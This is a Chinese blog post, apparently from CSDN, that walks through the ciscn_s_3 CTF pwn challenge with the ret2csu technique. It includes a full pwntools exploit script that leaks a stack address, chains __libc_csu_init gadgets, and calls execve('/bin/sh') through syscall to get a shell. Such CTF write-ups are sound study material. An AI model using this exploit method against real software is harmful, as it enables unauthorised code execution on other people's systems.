PWNret2csu技巧题目ciscn_s_3

于 2024-01-27 21:36:30 发布
阅读量896 收藏 23
点赞数 16
文章标签: python 学习方法 linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_74312867/article/details/135888702
版权

ret2csu

csu技巧:程序一般都会有一个__libc_csu_init()函数,函数里面会有很多对于寄存器的操作,如果通过溢出等手段进入那里,就可以对函数参数设置

b站星盟安全的师傅讲的很好,这是课程里面的截图
在这里插入图片描述
补充一点小知识
32 位:系统调用号放入 eax,参数依次放到 ebx、ecx、edx,返回值放在 eax
64 位:系统调用号放入 rax,参数依次放到 rdi、rsi、rdx,返回值放在 rax
题目 ciscn_s_3
ida打开看一下
请添加图片描述
程序里还有一个gadgets的函数,题目作者很明显想让我们利用里面的gadget,此时有个让rax(系统调用号)为0xf和0x3b的,查了一下0xf是sigreturn函数的调用号,0x3b是execve函数的调用号,所以题目有两种方法,但是sigreturn函数查了一下不太清楚是什么,所以我们用execve函数
请添加图片描述
题目思路:

利用ret2csu构造函数execve(“/bin/sh”),首先要写入binsh字符串,并找到它的真实地址,第一个read和write就是让我们这么做的,然后栈溢出返回值继续返回到vuln函数,第二次read函数溢出到csu里面设置execve,最后ret到syscall调用函数

首先写入binsh字符串,并找到它的真实地址

看到write函数,函数是从rsp-0x10开始输出0x30个字节,而buf的内容加上它的rbp,ret一共就0x20个字节,所以每次write都会泄露栈上的某个地址,而这个地址和我们输入的地址间的偏移是固定的也就是:0xdea8-0xdd60=0x148,有了这个偏移我们每次都能找到bin/sh的真实地址请添加图片描述
请添加图片描述
然后是设置函数 我们想要的是execve(“/bin/sh”)即rdi=sh_addr,rsi=0,rdx=0,这就要通过__libc_csu_init()函数来赋值,这个csu_addr1和csu_addr2位置其实没什么要求,最重要的是系统调用号
请添加图片描述
然后看到payload处,有人可能对这个0x50表示疑惑,这道题我看了别人的解析发现好像根本不太用设置这些寄存器0.0,咳咳,这个sh+0x50是赋值给r12的,看到上图的0x400589处,它会call一个地址,而这个p64(csu_addr2)正好是sh_addr+0x50,那么就会跳转到csu_addr2处(r12+rbx*8 然后rbx=0,r12是sh_addr+0x50在payload中也就是csu_addr2)

payload += p64(sh_addr+0x50)  #r12
...
payload += p64(csu_addr2)  #call[r12+rbx*8]

小贴士,64位函数传参pop rdi + 参数

找pop rdi:ROPgadget --binary ciscn_s_3 |grep “pop rdi”

最后设置完随便跳转到一个syscall处就会执行execve(“/bin/sh”)啦
请添加图片描述
但是这道题还有个小问题,就是不知道为什么本地的sh_addr的偏移是0x148,而远程的是0x118,这个可能跟libc有关吧,我也懒得换个libc试一下00

from pwn import *
context.arch = 'amd64'
context.log_level='debug'
p = process('./ciscn_s_3')
#p = remote("node5.buuoj.cn",25042)

#find_real_binsh
vuln_addr = 0x4004ED
payload=b'/bin/sh\x00'+b'a'*8+p64(vuln_addr) #不用覆盖rbp,汇编中没有leave
p.sendline(payload)
#gdb.attach(p,'b *0x400503')

p.recv(0x20)
sh_addr = u64(p.recv(8))-0x148
print(hex(sh_addr))

sys_execve_addr = 0x4004E2

#set csu
csu_addr1 = 0x40059A  #pop rbx
csu_addr2 = 0x400580  #mov rdx,r13
#rdi=sh,rsi=0,rdx=0
payload = b'/bin/sh\x00'+b'a'*8+p64(csu_addr1) 
payload += p64(0)  #rbx
payload += p64(0)  #rbp
payload += p64(sh_addr+0x50)  #r12
payload += p64(0)  #r13
payload += p64(0)  #r14
payload += p64(0)  #r15
payload += p64(csu_addr2)  #call[r12+rbx*8]
payload += p64(sys_execve_addr)
#rdi+sh+ret
payload += p64(0x4005a3)+p64(sh_addr)+p64(0x400501) #syscall
p.sendline(payload)

p.interactive()
1ip123
关注
  • 16
    点赞
  • 23
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CSU8000_3.16_6251.EXE
07-05
许继CSU8000远动软件
CSU计网实验A3题目
最新发布
06-17
### 2. 实验要求 - **创建连接套接字**:每当有客户端连接到服务器时,服务器需创建一个新的套接字来处理这个连接。 - **接收HTTP请求**:服务器需从连接套接字中接收客户端发送的HTTP请求。 - **解释请求**:对收到...
SROP学习 smallest & ciscn_s_3
红叶的博客
03-19 475
SROP学习,例题 smallest ,ciscn_s_3
我又pwn了 ——刷题篇 ciscn_s_3
m0_64195960的博客
08-08 461
ret2csu&SROP
【CTF】【PWNciscn_s_3题解
m0_50819561的博客
09-23 750
前置知识: 64位系统: 传参方式:首先将系统调用号 传入 rax,然后将参数从左到右依次存入 rdi,rsi,rdx寄存器中,返回值存在rax寄存器 调用号:sys_read 的调用号为0,sys_write 的调用号 为1 stub_execve 的调用号为59,stub_rt_sigreturn 的调用号为15 调用方式: 使用 syscall 进行系统调用 首先惯例checksec一下。发现NX保护开了。 用IDA打开文件之后返现main函数里面套了一个vuln函数。跟进去查看如下 tab转汇编
pwn ciscn_2019_s_3
beaster1的博客
03-23 195
pwn ciscn_2019_s_3(srop) checksec一下发现是64位文件 并只开了NX保护 打开IDA 进入main函数直接转到vuln(可以看到明显栈溢出var_10距离rpb 0x10) 发现有两个系统调用号,系统调用号的传参方式是先将调用号传入rax,然后参数依次从左至右传入rdi,rsi,rdx寄存器中,最后返回值存入rax 看到最后有点奇怪开始时pop rbp mov rbp,rsp 程序结束的时候直接是:retn(pop rip) 这里直接就跳出vuln函数了 所以r
ciscn_2019_s_3
qq_45691294的博客
12-29 2158
首先拿到程序先查看一下程序类型 是一个x86-64的ELF文件,查看一下保护,只开启了堆栈不可执行保护 用IDA分析一下该程序 main函数直接进入到vuln函数,这里利用了系统调用,64位的系统调用的传参方式为 首先将系统调用号 传入 rax,然后将参数 从左到右 依次存入 rdi,rsi,rdx寄存器中,返回值存在rax寄存器 vuln函数执行了read(0,buf,0x400),又执行了write(1,buf,0x30)。看一下buf的位置,发现距离rbp只有0x10大小,存在栈溢出 这里的栈
BUUCTF(pwn) ciscn_2019_s_3 [ 栈溢出SROP攻击]
半岛铁盒的博客
08-10 359
64位,开启了NX保护 main函数调用了vuln
DS_CSU18M88_V3.4_CN_csu18m88_
09-30
CSU18M88芯片详解》 CSU18M88是一款高性能、低功耗的微控制器,广泛应用于各类嵌入式系统中。本文将深入探讨该芯片的资源特性,帮助开发者全面理解其功能和应用潜力。 首先,CSU18M88的核心是基于ARM Cortex-M8...
芯海CSU32MX10系列DEMO程序_CSU32MX10_C++_troopseh6_芯海_DEMO_
10-03
3. **驱动程序**:为了操作硬件资源,DEMO可能包含了针对CSU32MX10的定制驱动程序,这些驱动程序是与硬件直接交互的低级别代码,负责处理中断、定时器和外设访问。 4. **库函数**:芯海可能提供了一些库函数,方便...
csu.rar_pci 采集 linux_pci 驱动_数据采集_采集卡
09-20
本资料主要涉及的是Linux操作系统下的PCI驱动程序开发,特别是针对一种名为"csu.rar_pci"的数据采集卡。在Linux系统中,设备驱动程序是操作系统与硬件设备之间的桥梁,它允许操作系统控制和通信硬件,从而实现数据的...
Pwnciscn_2019_s_3 wp 解析(bin/sh+0x50)
Lcw_linyx的博客
05-09 1117
本题用到了ret2csu,也可通过srop,重点讲/bin/sh+0x50
PWN-ret2csu
recover517的博客
12-06 532
在x64中,如果遇到函数调用需要传入3个参数,分别依赖【rdi,rsi,rdx】三个寄存器,但通过ROPgadget无法找到相关的寄存器利用链,这时,我们就要开始考虑通过调用__libc_csu_init函数来实现传递3个参数的效果,这种实现方式,称为 ret2csu
wikiCTF-pwn-ret2csu
Oops-re的博客
10-20 404
在 64 位程序中,函数的前 6 个参数是通过寄存器传递的,但是大多数时候,我们很难找到每一个寄存器对应的 gadgets。这时候,我们可以利用 x64 下的 __libc_csu_init 中的 gadgets。
PWN-栈溢出之ret2csu
weixin_53394081的博客
04-23 337
PWN-栈溢出之ret2csu
pwn中级ROP——ret2csu
turtlesd的博客
04-27 842
地址 栈中数据 return前 a * 136 main函数return(rsp) 0x400606(gadget1) rsp + 8 0(填充数据) rsp + 16(rbx) 0 rsp + 24(rbp) 1 rsp + 32(r12) write_got_addr rsp + 40(r13) 1 rsp + 48(r14) write_got_addr rsp + 56(r15) 8 gadget1的return 0x4005F0(gadget2)...
pwn刷题num48----syscall + ret2csu
tbsqigongzi的博客
05-04 895
BUUCTF-PWN-ciscn_2019_s_3 首先查保护–>看链接类型–>赋予程序可执行权限–>试运行 (这里为了省事,自己写了一个小shell脚本) 64位程序,小端序 开启部分RELRO-----got表可写 未开启canary保护-----存在栈溢出 开启NX保护-----堆栈不可执行 未开启PIE-----程序地址为真实地址 动态链接 ida一下看一下主函数 这里sys_read和sys_write读取的字符串大小都大于buf的大小,存在栈溢出 syscall 系统
从o开始的pwn学习之ret2csu
jzc020121的博客
04-09 2919
ret2csu 前置知识 X64寄存器 我们知道,64位寄存器有RAX,RBX,RCX,RDX,RDI,RSI,RBP,RSP,R8,R9,R10,R11,R12,R13,R14,R15,而rdi,rsi,rdx,rcx,r8,r9便用来传递函数的前六个参数,如多于六个,便在放到栈里。 __libc_csu_init 一般的程序都会调用libc中的函数,而此函数便是来将libc初始化的,故此函数几乎是每一个程序所必备的。 gadget 我们在构造ROP链的时候,往往会用到能够给寄存器赋值的gadget,形如
Ret2csu level5 & ciscn_2019_s_3
红叶的博客
11-06 434
本题难点:对栈的理解需要稍微更深入一点。
.readback = csu8rt30113_readback, .get_size = csu8rt30113_get_size, .read_info = csu8rt30113_read_info, .is_matched = csu8rt30113_is_matched, .hande_shake = csu8rt30113_hande_shake, .get_id = csu8rt30113_get_id, .osc_cali = csu8rt30113_osc_cali, .wdt_cali = csu8rt30113_wdt_cali, .adc_cali = csu8rt30113_adc_cali, .blank_check = csu8rt30113_blank_check, .erase = csu8rt30113_erase, .program = csu8rt30113_program, .protect = csu8rt30113_protect, .verify = csu8rt30113_verify,
06-08
这段代码看起来是一个结构体的初始化,结构体中包含多个函数指针,每个指针指向一个具体的函数实现。这些函数用于与某个芯片进行通信,实现对芯片的读取、编程、校验等操作。具体而言: - is_matched:用于判断当前...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值